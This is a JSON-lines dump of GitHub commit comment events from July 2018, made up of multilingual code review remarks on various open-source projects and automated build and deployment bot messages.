{"id":"8022321179","type":"CommitCommentEvent","actor":{"login":"stavrospapadopoulos"},"repo":{"name":"TileDB-Inc/TileDB"},"payload":{"comment":{"id":29842931,"position":40,"line":1912,"path":"tiledb/sm/c_api/tiledb.cc","commit_id":"8b18e55263a61516007761ebe656ce85920d2691","created_at":"2018-07-26T12:14:54Z","updated_at":"2018-07-26T12:14:54Z","author_association":"CONTRIBUTOR","body":"I think there is a more elegant way to do this. Using an array schema setter there may not be the best way."}},"created_at":"2018-07-26T12:14:54Z"}
{"id":"8022321810","type":"CommitCommentEvent","actor":{"login":"smowton"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29842936,"position":29,"line":251,"path":"src/analyses/ai.h","commit_id":"574f29c7d0e1372dec405efe6c720ee337351052","created_at":"2018-07-26T12:15:02Z","updated_at":"2018-07-26T12:15:02Z","author_association":"NONE","body":"Currently \"from location l\""}},"created_at":"2018-07-26T12:15:02Z"}
{"id":"8022323368","type":"CommitCommentEvent","actor":{"login":"smowton"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29842940,"position":14,"line":252,"path":"src/analyses/ai.cpp","commit_id":"9b2a98a82e36d014b66d5775e46c6bc7493114af","created_at":"2018-07-26T12:15:21Z","updated_at":"2018-07-26T12:15:21Z","author_association":"NONE","body":"spacing"}},"created_at":"2018-07-26T12:15:21Z"}
{"id":"8022324700","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29842947,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-26T12:15:38Z","updated_at":"2018-07-26T12:15:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T12:15:38Z"}
{"id":"8022325024","type":"CommitCommentEvent","actor":{"login":"stavrospapadopoulos"},"repo":{"name":"TileDB-Inc/TileDB"},"payload":{"comment":{"id":29842948,"position":63,"line":1935,"path":"tiledb/sm/c_api/tiledb.cc","commit_id":"8b18e55263a61516007761ebe656ce85920d2691","created_at":"2018-07-26T12:15:42Z","updated_at":"2018-07-26T12:15:42Z","author_association":"CONTRIBUTOR","body":"Now I understand. Hmmm, I am wondering whether `Query::copy_json` can get `json_returned` directly as input. I feel that there are unnecessary copies involved the way it is written now and may also be a bit confusing."}},"created_at":"2018-07-26T12:15:42Z"}
{"id":"8022326782","type":"CommitCommentEvent","actor":{"login":"RubenVerborgh"},"repo":{"name":"solid/solid-auth-client"},"payload":{"comment":{"id":29842955,"position":5,"line":128,"path":"README.md","commit_id":"02c73465256715ebd9d04e7170071e2b19b8aafa","created_at":"2018-07-26T12:16:05Z","updated_at":"2018-07-26T12:16:05Z","author_association":"MEMBER","body":"@timbl Makes only sense for developers, and they are covered in the instructions lower in the README. People who just want to create a popup, are fine with the global installation instructions."}},"created_at":"2018-07-26T12:16:05Z"}
{"id":"8022328178","type":"CommitCommentEvent","actor":{"login":"smowton"},"repo":{"name":"martin-cs/cbmc"},"payload":{"comment":{"id":29842956,"position":42,"line":405,"path":"src/analyses/ai.cpp","commit_id":"9b2a98a82e36d014b66d5775e46c6bc7493114af","created_at":"2018-07-26T12:16:21Z","updated_at":"2018-07-26T12:16:21Z","author_association":"NONE","body":"Perhaps stronger, `function.id() == ID_symbol`?"}},"created_at":"2018-07-26T12:16:21Z"}
{"id":"8022339457","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"fujita0622/whyJavaObjectOrientation"},"payload":{"comment":{"id":29842980,"position":null,"line":null,"path":null,"commit_id":"c226893030a9149cfd311f59f0c990871e48d004","created_at":"2018-07-26T12:18:42Z","updated_at":"2018-07-26T12:18:42Z","author_association":"NONE","body":"山本　指摘\r\n仕様が「じゃんけんは3回戦まで」となっているが、「3回勝つまでじゃんけんをくりかえす」と記載されているので仕様が誤っている。\r\nまた、「じゃんけん終了を表示」の仕様が抜け落ちている"}},"created_at":"2018-07-26T12:18:42Z"}
{"id":"8022340418","type":"CommitCommentEvent","actor":{"login":"jakkab"},"repo":{"name":"crabtree/kyma"},"payload":{"comment":{"id":29842981,"position":65,"line":64,"path":"installation/README.md","commit_id":"40f6fb1aea7b60ed569eaf8aa847afa21367e0d4","created_at":"2018-07-26T12:18:53Z","updated_at":"2018-07-26T12:18:53Z","author_association":"NONE","body":"To trigger the installation of Kyma, you will need a Custom Resource file. Copy the `installer-cr.yaml.tpl` file, rename it to `installer-cr.yaml`, and fill in the placeholders:"}},"created_at":"2018-07-26T12:18:53Z"}
{"id":"8022342529","type":"CommitCommentEvent","actor":{"login":"emiliasmolko"},"repo":{"name":"emiliasmolko/boardGames"},"payload":{"comment":{"id":29842984,"position":null,"line":null,"path":null,"commit_id":"c34530962a9985d52ed27aa97625cf133c7feae2","created_at":"2018-07-26T12:19:19Z","updated_at":"2018-07-26T12:19:19Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/95818ac2-c557-427c-88fd-7aa2d98bb0e9?env_id=ibm%3Ayp%3Aus-south \"boardGames\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/1dfeec01-3e68-4e47-8825-d2d2cf72360a?env_id=ibm%3Ayp%3Aus-south \"boardGames\") deployed [boardGames](https://github.com/emiliasmolko/boardGames/releases/tag/deploy-ibm-yp-us-south-emiliasmolko-wecare-20180726-121919 \"deploy-ibm-yp-us-south-emiliasmolko-wecare-20180726-121919\") to [wecare](https://console.bluemix.net/apps/3398464f-f0fe-4414-a9f3-c5082ee3e9f5?env_id=ibm:yp:us-south \"ibm:yp:us-south:emiliasmolko:wecare\"), including this commit"}},"created_at":"2018-07-26T12:19:19Z"}
{"id":"8022395351","type":"CommitCommentEvent","actor":{"login":"gokhanpolat265"},"repo":{"name":"gokhanpolat265/blog-site"},"payload":{"comment":{"id":29843103,"position":1,"line":1,"path":"README.md","commit_id":"04ba91b95ba17f3a30a80eb1688f2ee1d1fdeb68","created_at":"2018-07-26T12:30:18Z","updated_at":"2018-07-26T12:30:18Z","author_association":"OWNER","body":"Gökhan Polat"}},"created_at":"2018-07-26T12:30:18Z"}
{"id":"8022397808","type":"CommitCommentEvent","actor":{"login":"gokhanpolat265"},"repo":{"name":"gokhanpolat265/blog-site"},"payload":{"comment":{"id":29843111,"position":1,"line":1,"path":"README.md","commit_id":"04ba91b95ba17f3a30a80eb1688f2ee1d1fdeb68","created_at":"2018-07-26T12:30:47Z","updated_at":"2018-07-26T12:30:47Z","author_association":"OWNER","body":"aaa"}},"created_at":"2018-07-26T12:30:47Z"}
{"id":"8022416563","type":"CommitCommentEvent","actor":{"login":"paliivolodymyr"},"repo":{"name":"Xerzing/wurksite"},"payload":{"comment":{"id":29843153,"position":40,"line":157,"path":"main.css","commit_id":"e0b82c86085a56139e0c6f38aba59c0c42d30b61","created_at":"2018-07-26T12:34:32Z","updated_at":"2018-07-26T12:34:32Z","author_association":"NONE","body":"Наскільки мені відомо в padding немає значення auto. Якщо ти хочеш його забрати то або ставиш 0, або ставиш unset"}},"created_at":"2018-07-26T12:34:32Z"}
{"id":"8022417424","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29843157,"position":1,"line":1,"path":"src/help_functions.c","commit_id":"b408cccdda5a5c29981f4791b71c2dcc2c8959c6","created_at":"2018-07-26T12:34:42Z","updated_at":"2018-07-26T12:34:42Z","author_association":"MEMBER","body":"Maybe call this helpers?"}},"created_at":"2018-07-26T12:34:42Z"}
{"id":"8022418986","type":"CommitCommentEvent","actor":{"login":"tanji"},"repo":{"name":"signal18/replication-manager"},"payload":{"comment":{"id":29843160,"position":5,"line":5,"path":"graphite/og-rek/ogorek.go","commit_id":"f3dcf4b7875842cc1c5211543e361a8cde06ed74","created_at":"2018-07-26T12:35:00Z","updated_at":"2018-07-26T12:35:00Z","author_association":"COLLABORATOR","body":"Sure thing. I ported the patch to 1.1.\nNB if you've got anything else to report next time please open an issue\nrather than commenting in the commit. It isn't really handy for followups.\nThank you\n\nLe jeu. 26 juil. 2018 à 12:44, Kirill Smelkov <notifications@github.com> a\nécrit :\n\n> Thanks for correcting. May I ask to please correct it in all related\n> branches? This commit (f3dcf4b\n> <https://github.com/signal18/replication-manager/commit/f3dcf4b7875842cc1c5211543e361a8cde06ed74>)\n> is dated 2017-03-01 and comes before 1.1.0-preview1. This way the state on\n> e.g. 1.1 branch is thus remains with incorrect copyright, authorship and\n> license:\n>\n>\n> https://github.com/signal18/replication-manager/blob/1.1/graphite/og-rek/ogorek.go\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/signal18/replication-manager/commit/f3dcf4b7875842cc1c5211543e361a8cde06ed74#commitcomment-29841934>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA7R_CjK2eZfOcdWsYoWCr3z0cvNRc1zks5uKZ2WgaJpZM4Vf5rj>\n> .\n>\n-- \nGuillaume Lefranc  - Managing Director\nSignal 18 SARL - Infrastructure Services - www.signal18.io\n"}},"created_at":"2018-07-26T12:35:00Z"}
{"id":"8022420101","type":"CommitCommentEvent","actor":{"login":"RaymondBigCat"},"repo":{"name":"RaymondBigCat/YOLO_v3_PyTorch"},"payload":{"comment":{"id":29843162,"position":null,"line":null,"path":null,"commit_id":"b71fd68b1a4e232d9ef1f30d54888384391d034f","created_at":"2018-07-26T12:35:15Z","updated_at":"2018-07-26T12:35:15Z","author_association":"OWNER","body":"analyse a XML file"}},"created_at":"2018-07-26T12:35:15Z"}
{"id":"8022421352","type":"CommitCommentEvent","actor":{"login":"braktar"},"repo":{"name":"fonsecadeline/optimizer-api"},"payload":{"comment":{"id":29843164,"position":7,"line":125,"path":"optimizer_wrapper.rb","commit_id":"a02e358baf8ac19def30c1f93228ddcebafb2bc9","created_at":"2018-07-26T12:35:30Z","updated_at":"2018-07-26T12:35:30Z","author_association":"COLLABORATOR","body":"twice service for two different objects\r\nprefer any? to collect+include?\r\nvrp_element.services.delete_if{ |service| @unfeasible_services.any?{ |sub_service| sub_service[:service_id] == service.id }"}},"created_at":"2018-07-26T12:35:30Z"}
{"id":"8022425680","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29843170,"position":110,"line":142,"path":"gui/core_gui/CCalibFromPlanesGui.cpp","commit_id":"ba670c2fd1fc84543429452ead9a7ade1b35b311","created_at":"2018-07-26T12:36:21Z","updated_at":"2018-07-26T12:36:21Z","author_association":"NONE","body":"@karnikram one of the main points of creating vv_clouds is to avoid running \r\nobs_item->project3DPointsFromDepthImageInto(*cloud, projection_params);\r\neverytime you need the this point cloud. So, when you read the dataset you need to initialize vv_clouds, and then, everytime you were calling obs_item->project3DPointsFromDepthImageInto, you should check first if the point cloud exists, if not, then you build it. \r\n\r\nBesides, you may use a map of vectors mv_clouds instead where the 1st map elements identifies the sensor ID, this will help to avoid bugs when you use a wrong index."}},"created_at":"2018-07-26T12:36:21Z"}
{"id":"8022426512","type":"CommitCommentEvent","actor":{"login":"paliivolodymyr"},"repo":{"name":"Xerzing/wurksite"},"payload":{"comment":{"id":29843171,"position":71,"line":333,"path":"main.css","commit_id":"e0b82c86085a56139e0c6f38aba59c0c42d30b61","created_at":"2018-07-26T12:36:31Z","updated_at":"2018-07-26T12:36:31Z","author_association":"NONE","body":"для таких випадків є :first-child"}},"created_at":"2018-07-26T12:36:31Z"}
{"id":"8022428052","type":"CommitCommentEvent","actor":{"login":"braktar"},"repo":{"name":"fonsecadeline/optimizer-api"},"payload":{"comment":{"id":29843177,"position":46,"line":421,"path":"wrappers/wrapper.rb","commit_id":"a02e358baf8ac19def30c1f93228ddcebafb2bc9","created_at":"2018-07-26T12:36:49Z","updated_at":"2018-07-26T12:36:49Z","author_association":"COLLABORATOR","body":"prefer none? to find+nil?"}},"created_at":"2018-07-26T12:36:49Z"}
{"id":"8022428720","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29843178,"position":null,"line":null,"path":null,"commit_id":"a67315d714db773a77cafab9807cc9859c38a74b","created_at":"2018-07-26T12:36:57Z","updated_at":"2018-07-26T12:36:57Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1697 of 1697 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a67315d714db773a77cafab9807cc9859c38a74b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a67315d714db773a77cafab9807cc9859c38a74b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a67315d714db773a77cafab9807cc9859c38a74b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.04%25-green.png)</a>\n"}},"created_at":"2018-07-26T12:36:57Z"}
{"id":"8022430230","type":"CommitCommentEvent","actor":{"login":"braktar"},"repo":{"name":"fonsecadeline/optimizer-api"},"payload":{"comment":{"id":29843185,"position":5,"line":364,"path":"wrappers/wrapper.rb","commit_id":"a02e358baf8ac19def30c1f93228ddcebafb2bc9","created_at":"2018-07-26T12:37:17Z","updated_at":"2018-07-26T12:37:17Z","author_association":"COLLABORATOR","body":"prefer none? to find+nil?"}},"created_at":"2018-07-26T12:37:17Z"}
{"id":"8022431007","type":"CommitCommentEvent","actor":{"login":"braktar"},"repo":{"name":"fonsecadeline/optimizer-api"},"payload":{"comment":{"id":29843187,"position":58,"line":447,"path":"wrappers/wrapper.rb","commit_id":"a02e358baf8ac19def30c1f93228ddcebafb2bc9","created_at":"2018-07-26T12:37:26Z","updated_at":"2018-07-26T12:37:26Z","author_association":"COLLABORATOR","body":"prefer none? to find+nil?"}},"created_at":"2018-07-26T12:37:26Z"}
{"id":"8022431081","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29843188,"position":1,"line":1,"path":"src/readotr.c","commit_id":"9e14fe38b4717d71560e99dc74bea9b877f14f7d","created_at":"2018-07-26T12:37:27Z","updated_at":"2018-07-26T12:37:27Z","author_association":"MEMBER","body":"Instead of copying this, it will be nice to implement it ourselves. "}},"created_at":"2018-07-26T12:37:27Z"}
{"id":"8022431367","type":"CommitCommentEvent","actor":{"login":"braktar"},"repo":{"name":"fonsecadeline/optimizer-api"},"payload":{"comment":{"id":29843189,"position":69,"line":457,"path":"wrappers/wrapper.rb","commit_id":"a02e358baf8ac19def30c1f93228ddcebafb2bc9","created_at":"2018-07-26T12:37:30Z","updated_at":"2018-07-26T12:37:30Z","author_association":"COLLABORATOR","body":"prefer none? to find+nil?"}},"created_at":"2018-07-26T12:37:30Z"}
{"id":"8022436134","type":"CommitCommentEvent","actor":{"login":"wi1dcard"},"repo":{"name":"wangkang09/knowledge-summary"},"payload":{"comment":{"id":29843198,"position":null,"line":null,"path":null,"commit_id":"32935f50e248542f50b3ed9ffbee1522d1410b72","created_at":"2018-07-26T12:38:27Z","updated_at":"2018-07-26T12:38:27Z","author_association":"NONE","body":"可以用如下方式\r\n\r\n`````\r\n```java\r\n// 代码段\r\n```\r\n`````\r\n\r\n来标记代码块会更规范。\r\n\r\n标题不需要带右侧的 `###` 也可以。"}},"created_at":"2018-07-26T12:38:27Z"}
{"id":"8022436652","type":"CommitCommentEvent","actor":{"login":"revolunet"},"repo":{"name":"getsentry/onpremise"},"payload":{"comment":{"id":29843199,"position":2,"line":17,"path":"README.md","commit_id":"4c00924afee251b9b892c81c2c323766381c8fd0","created_at":"2018-07-26T12:38:33Z","updated_at":"2018-07-26T12:38:33Z","author_association":"CONTRIBUTOR","body":"yes, useless now"}},"created_at":"2018-07-26T12:38:33Z"}
{"id":"8022439356","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29843203,"position":28,"line":144,"path":"gui/viewer/CViewerContainer.cpp","commit_id":"ba670c2fd1fc84543429452ead9a7ade1b35b311","created_at":"2018-07-26T12:39:06Z","updated_at":"2018-07-26T12:39:06Z","author_association":"NONE","body":"@karnikram \r\nYou can avoid easily this switch to save some lines of code!"}},"created_at":"2018-07-26T12:39:06Z"}
{"id":"8022443670","type":"CommitCommentEvent","actor":{"login":"wi1dcard"},"repo":{"name":"wangkang09/knowledge-summary"},"payload":{"comment":{"id":29843208,"position":null,"line":null,"path":null,"commit_id":"fdde20abd71189b56cf41fffb7a1678381d6af1b","created_at":"2018-07-26T12:39:55Z","updated_at":"2018-07-26T12:39:55Z","author_association":"NONE","body":"Markdown 引用自己仓库的其它文件其实可以直接写相对路径。"}},"created_at":"2018-07-26T12:39:55Z"}
{"id":"8022443831","type":"CommitCommentEvent","actor":{"login":"braktar"},"repo":{"name":"fonsecadeline/optimizer-api"},"payload":{"comment":{"id":29843209,"position":4,"line":232,"path":"optimizer_wrapper.rb","commit_id":"bcd819901e9671ae5ae53309feed2df50d78fb51","created_at":"2018-07-26T12:39:57Z","updated_at":"2018-07-26T12:39:57Z","author_association":"COLLABORATOR","body":"service used twice\r\n+ prefer any? to collect+include?"}},"created_at":"2018-07-26T12:39:57Z"}
{"id":"8022447428","type":"CommitCommentEvent","actor":{"login":"sjcallender"},"repo":{"name":"FosterCommerce/CommerceRegisterOnCheckout"},"payload":{"comment":{"id":29843216,"position":null,"line":null,"path":null,"commit_id":"3e3470f23e006ce3f35a3bc9408ef4f19028a9c6","created_at":"2018-07-26T12:40:35Z","updated_at":"2018-07-26T12:40:35Z","author_association":"NONE","body":"Ty is going to update the readme soon. Once that happens, it'll be good to go. Do you want to continue to manage it and handle bugs? That's what we're thinking and plan on putting in a PR. If you'd rather not maintain it, we're fine to handle all that stuff. Just let me know."}},"created_at":"2018-07-26T12:40:35Z"}
{"id":"8022447579","type":"CommitCommentEvent","actor":{"login":"xuedong"},"repo":{"name":"xuedong/BestArm.jl"},"payload":{"comment":{"id":29843217,"position":16,"line":38,"path":"src/BestArm.jl","commit_id":"3fb2930d245ac2963b7f37cec3e9234764f88f24","created_at":"2018-07-26T12:40:37Z","updated_at":"2018-07-26T12:40:37Z","author_association":"OWNER","body":"@Naereen you are right, I didn't think of Windows actually."}},"created_at":"2018-07-26T12:40:37Z"}
{"id":"8022450804","type":"CommitCommentEvent","actor":{"login":"paliivolodymyr"},"repo":{"name":"Xerzing/wurksite"},"payload":{"comment":{"id":29843227,"position":90,"line":381,"path":"main.css","commit_id":"e0b82c86085a56139e0c6f38aba59c0c42d30b61","created_at":"2018-07-26T12:41:14Z","updated_at":"2018-07-26T12:41:14Z","author_association":"NONE","body":"якщо є якісь спільні проперті в селекторів, то винось їх в батьківський селектор, можна писати типу \".some-class * {}\" тоді всі стилі які ти написав застосуються для всіх дочірніх тегів класу some-class"}},"created_at":"2018-07-26T12:41:14Z"}
{"id":"8022456530","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29843239,"position":15,"line":27,"path":"src/otrng_parse.c","commit_id":"dde5316e0930b265dce21435c7b98245b121dc1f","created_at":"2018-07-26T12:42:22Z","updated_at":"2018-07-26T12:42:22Z","author_association":"MEMBER","body":"I don't understand this. The message error already contains the human readable part.. why is this been assigned again?"}},"created_at":"2018-07-26T12:42:22Z"}
{"id":"8022458745","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29843243,"position":15,"line":66,"path":"src/help_functions.c","commit_id":"d607a9a7ef04dd79cc325899fbd7fdf07ec22a47","created_at":"2018-07-26T12:42:47Z","updated_at":"2018-07-26T12:42:47Z","author_association":"MEMBER","body":"The error message should already contain this. "}},"created_at":"2018-07-26T12:42:47Z"}
{"id":"8022463444","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-latinLit"},"payload":{"comment":{"id":29843250,"position":null,"line":null,"path":null,"commit_id":"d5f9e4894b8fe1e344d46108340621265ec9244d","created_at":"2018-07-26T12:43:43Z","updated_at":"2018-07-26T12:43:43Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     0.07 |\n| `metadata_passing` |     1    |\n| `metadata_total`   |     2    |\n| `nodes_count`      |   656    |\n\n## Words\n\n| Changed   | Status   |\n|:----------|:---------|\n| `UNK`     | New      |\n\n## Units\n\n| Changed                             | Status   |\n|:------------------------------------|:---------|\n| `./data/phi0969/__cts__.xml`        | New      |\n| `./data/phi0969/phi001/__cts__.xml` | New      |\n| `./data/phi0969/__cts__.xml`        | Passing  |\n| `./data/phi0969/phi001/__cts__.xml` | Failing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-latinLit/4489)*\n"}},"created_at":"2018-07-26T12:43:43Z"}
{"id":"8022463515","type":"CommitCommentEvent","actor":{"login":"xuedong"},"repo":{"name":"xuedong/BestArm.jl"},"payload":{"comment":{"id":29843251,"position":78,"line":34,"path":"src/fixed_confidence/track_stop.jl","commit_id":"78b5441066e637bc6524cd4d17f5af011bad140c","created_at":"2018-07-26T12:43:44Z","updated_at":"2018-07-26T12:43:44Z","author_association":"OWNER","body":"which part exactly? btw, all the fixed confidence algos are implemented by Emilie, which I am not that familiar with."}},"created_at":"2018-07-26T12:43:44Z"}
{"id":"8022463693","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29843252,"position":11,"line":13,"path":"src/otrng_parse.c","commit_id":"68ff226acaa5e7e844761bceae66eae1f0a37ec4","created_at":"2018-07-26T12:43:46Z","updated_at":"2018-07-26T12:43:46Z","author_association":"MEMBER","body":"why are these macros defined inside of the function?"}},"created_at":"2018-07-26T12:43:46Z"}
{"id":"8022464113","type":"CommitCommentEvent","actor":{"login":"branscombj"},"repo":{"name":"lzim/teampsd"},"payload":{"comment":{"id":29843258,"position":5,"line":32,"path":"model_workgroup/models/agg_v11_2018_06_25_lzedits.mdl","commit_id":"5eac487c334df15f0c160ae82b7a222cf92dc345","created_at":"2018-07-26T12:43:51Z","updated_at":"2018-07-26T12:43:51Z","author_association":"COLLABORATOR","body":"These are correct except that for labeling purposes we agreed to use special characters \"/\" and \"%\" for user-friendliness; while for naming runs we will avoid them and drop some letters for brevity: \r\n\r\nUnit | Abbreviation for naming runs | Abbreviation   for labeling\r\n-- | -- | --\r\nPercent | pct | %\r\nPatients | pts | pts\r\nPatients per   week | ppw | pts/wk\r\nAppointments | appt | appt\r\nAppointments   per week | apw | appt/wk\r\nWeeks | wks | wks\r\nWeek | wk | wk\r\nPoints | pnts | pnts\r\nHours per week | hpw | hrs/wk\r\nHours | hrs | hrs\r\n\r\n"}},"created_at":"2018-07-26T12:43:51Z"}
{"id":"8022470367","type":"CommitCommentEvent","actor":{"login":"Renny4Real"},"repo":{"name":"Renny4Real/tic_tac_toe"},"payload":{"comment":{"id":29843274,"position":103,"line":90,"path":"lib/check_board.rb","commit_id":"0275a52059132b66118048df618bc4808cfedf81","created_at":"2018-07-26T12:45:07Z","updated_at":"2018-07-26T12:45:07Z","author_association":"OWNER","body":"Since we are returning the status of the board rather than the score, it might be a better name."}},"created_at":"2018-07-26T12:45:07Z"}
{"id":"8022471656","type":"CommitCommentEvent","actor":{"login":"xuedong"},"repo":{"name":"xuedong/BestArm.jl"},"payload":{"comment":{"id":29843277,"position":78,"line":34,"path":"src/fixed_confidence/track_stop.jl","commit_id":"78b5441066e637bc6524cd4d17f5af011bad140c","created_at":"2018-07-26T12:45:21Z","updated_at":"2018-07-26T12:45:21Z","author_association":"OWNER","body":"the reference paper is this one http://chercheurs.lille.inria.fr/ekaufman/GK16.pdf"}},"created_at":"2018-07-26T12:45:21Z"}
{"id":"8022472134","type":"CommitCommentEvent","actor":{"login":"Maxim-Seredkin"},"repo":{"name":"antkorwin/xsync"},"payload":{"comment":{"id":29843278,"position":5,"line":130,"path":"src/test/java/com/antkorwin/xsync/XSyncTest.java","commit_id":"e5e415785d2e8d46d1e6f361cfdda4529b591525","created_at":"2018-07-26T12:45:27Z","updated_at":"2018-07-26T12:45:27Z","author_association":"NONE","body":"@_Ignore"}},"created_at":"2018-07-26T12:45:27Z"}
{"id":"8022472515","type":"CommitCommentEvent","actor":{"login":"pastorcmentarny"},"repo":{"name":"FasterXML/jackson-module-kotlin"},"payload":{"comment":{"id":29843279,"position":4,"line":7,"path":"release-notes/VERSION","commit_id":"2a251e1ec3ca10aab64512ee727df190b979b396","created_at":"2018-07-26T12:45:31Z","updated_at":"2018-07-26T12:45:31Z","author_association":"NONE","body":"I think you meant 2018 not 2016"}},"created_at":"2018-07-26T12:45:31Z"}
{"id":"8022476557","type":"CommitCommentEvent","actor":{"login":"tmortagne"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29843287,"position":249,"line":273,"path":"xwiki-platform-core/xwiki-platform-configuration/xwiki-platform-configuration-default/src/main/java/org/xwiki/configuration/internal/AbstractDocumentConfigurationSource.java","commit_id":"e8208d08dd4d9be5143002d33ca8431f7decf90f","created_at":"2018-07-26T12:46:18Z","updated_at":"2018-07-26T12:46:18Z","author_association":"MEMBER","body":"> A. Have the key contain the value as well, so we can cache multiple converted values of the same raw value\r\n\r\nYou mean the type ? Because we obviously don't know the value yet :)"}},"created_at":"2018-07-26T12:46:18Z"}
{"id":"8022476724","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"carboninc/ThinkRuby"},"payload":{"comment":{"id":29843290,"position":5,"line":5,"path":"3/railway_manager.rb","commit_id":"c16dfd851dc9418b22648c28bf45e6307e8c0a37","created_at":"2018-07-26T12:46:20Z","updated_at":"2018-07-26T12:46:20Z","author_association":"NONE","body":"я бы назвал вместо trains_on_station просто trains, потому что когда будешь использовать в коде, то\r\n`my_station.trains`\r\nкрасивей, чем:\r\n`my_station.trains_on_station`\r\nДело вкуса, но как по мне, так короче"}},"created_at":"2018-07-26T12:46:20Z"}
{"id":"8022477633","type":"CommitCommentEvent","actor":{"login":"Naereen"},"repo":{"name":"xuedong/BestArm.jl"},"payload":{"comment":{"id":29843292,"position":78,"line":34,"path":"src/fixed_confidence/track_stop.jl","commit_id":"78b5441066e637bc6524cd4d17f5af011bad140c","created_at":"2018-07-26T12:46:30Z","updated_at":"2018-07-26T12:46:30Z","author_association":"NONE","body":"The `t >10000000` part looks weird, it's not dependent on the simulation parameters?"}},"created_at":"2018-07-26T12:46:30Z"}
{"id":"8022479169","type":"CommitCommentEvent","actor":{"login":"L-Eli"},"repo":{"name":"L-Eli/Content-Type-Handling"},"payload":{"comment":{"id":29843299,"position":15,"line":30,"path":"routes/api.php","commit_id":"b5c2501039274180d55f0d9f7ed756f8cef92c8b","created_at":"2018-07-26T12:46:48Z","updated_at":"2018-07-26T12:46:48Z","author_association":"OWNER","body":"This route was alternate from `put` to `post` method (end point `/post/binary`)"}},"created_at":"2018-07-26T12:46:48Z"}
{"id":"8022480942","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29843303,"position":18,"line":19,"path":"src/otrng_parse.c","commit_id":"68ff226acaa5e7e844761bceae66eae1f0a37ec4","created_at":"2018-07-26T12:47:08Z","updated_at":"2018-07-26T12:47:08Z","author_association":"MEMBER","body":"mmm.. should this be 'with the white space tag?'"}},"created_at":"2018-07-26T12:47:08Z"}
{"id":"8022484864","type":"CommitCommentEvent","actor":{"login":"Maxim-Seredkin"},"repo":{"name":"antkorwin/xsync"},"payload":{"comment":{"id":29843314,"position":16,"line":56,"path":"src/main/java/com/antkorwin/xsync/XMutexFactory.java","commit_id":"e5e415785d2e8d46d1e6f361cfdda4529b591525","created_at":"2018-07-26T12:47:52Z","updated_at":"2018-07-26T12:47:52Z","author_association":"NONE","body":"И здесь что-то оставил"}},"created_at":"2018-07-26T12:47:52Z"}
